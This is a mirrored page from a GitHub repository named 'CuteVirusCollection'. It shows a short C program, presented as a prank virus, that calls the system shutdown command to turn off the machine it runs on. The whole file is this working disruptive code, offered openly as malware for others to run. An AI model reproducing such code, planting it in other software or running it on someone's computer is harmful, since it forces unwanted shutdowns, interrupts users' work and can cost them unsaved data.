mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
9 lines
134 B
C
9 lines
134 B
C
// Developer: Minhas Kamal
|
|
// Functionality: Simply shuts the system down.
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|